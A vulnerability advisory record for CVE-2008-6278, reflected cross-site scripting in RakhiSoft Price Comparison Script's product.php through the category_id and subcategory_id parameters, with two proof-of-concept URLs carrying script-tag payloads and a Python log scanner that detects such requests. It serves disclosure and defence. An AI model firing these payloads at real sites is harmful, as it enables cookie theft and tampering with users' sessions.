https://www.exploit-db.com/exploits/32607
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-571
RakhiSoft Price Comparison Script 'product.php' Cross-Site Scripting Vulnerability






Vulnerability ID | 1116846 | Vulnerability type | Cross-site scripting |
Published | 2008-11-28 | Updated | 2009-02-26 |
CVE-2008-6278 | CNNVD-200902-571 |
Platform | PHP | CVSS score | 4.3 |
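|Vulnerability source
|Vulnerability details
Price Comparison Script is an online shopping-cart comparison script. Multiple cross-site scripting vulnerabilities exist in product.php in Rakhi Software Price Comparison Script (also known as Shopping Cart). Remote attackers can inject arbitrary web script or HTML via the (1) category_id and (2) subcategory_id parameters.
|Exploit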
source: http://www.securityfocus.com/bid/32563/info
RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(1949308870);</script>&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>'><script>alert(1949308870);</script>
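
A detection-side sketch for the two parameters named above, added here as an example and not part of the original advisory or the vendor's code: it scans web access-log lines for product.php requests whose category_id or subcategory_id is not a plain integer. The numeric-ID rule, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory names as injectable in product.php.
WATCHED_PARAMS = ("category_id", "subcategory_id")
# Assumption: legitimate IDs are short decimal integers.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request field of a common/combined-format access log line.
REQUEST_FIELD = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2008:10:00:00 +0000] "GET /rjbike_new/product.php?category_id=1&subcategory_id=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Dec/2008:10:00:07 +0000] "GET /rjbike_new/product.php?category_id=%3E%27%3E%3Cscript%3Ealert(1)%3B%3C/script%3E&subcategory_id=1 HTTP/1.1" 200 5304',
    '192.0.2.10 - - [01/Dec/2008:10:00:09 +0000] "GET /rjbike_new/index.php?category_id=abc HTTP/1.1" 200 100',
]


def suspicious_params(target):
    """Return (name, decoded value) pairs, in request order, that fail the ID rule."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/product.php"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so encoded markup is checked in clear form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and not VALID_ID.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (line_number, hits) for each log line carrying a suspicious request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_FIELD.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            yield number, hits


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

The same allowlist (integer-only IDs) is the server-side input check that would reject these requests before the values reach the page output.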
|References
Source: BID
Name: 32563
Link: http://www.securityfocus.com/bid/32563
Source: SECUNIA
Name: 32950
Link: http://secunia.com/advisories/32950
Source: MISC
Link: http://packetstormsecurity.com/0811-exploits/rakhi-sqlxssfpd.txt
Source: OSVDB
Name: 50326
Link: http://osvdb.org/50326